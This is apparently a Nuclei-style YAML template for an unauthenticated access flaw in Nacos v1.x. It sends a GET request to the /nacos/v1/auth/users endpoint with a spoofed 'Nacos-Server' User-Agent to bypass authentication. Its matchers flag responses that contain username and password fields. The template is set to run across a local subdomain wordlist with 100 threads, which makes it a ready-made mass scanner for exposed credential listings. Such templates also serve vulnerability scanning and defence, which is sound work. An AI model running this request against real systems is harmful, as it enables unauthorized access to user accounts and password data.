id: unauthenticated-nacos-access 1

info:
  name: Unauthenticated Nacos access v1.x
  author: taielab,pikpikcu
  severity: critical
#  issues: https://github.com/alibaba/nacos/issues/4593
  tags: nacos,unauth

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Nacos-Server
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Content-Type: application/json"
        part: header

      - type: regex
        regex:
          - '"username":'
          - '"password":'
        part: body
        condition: and

      - type: status
        status:
          - 200
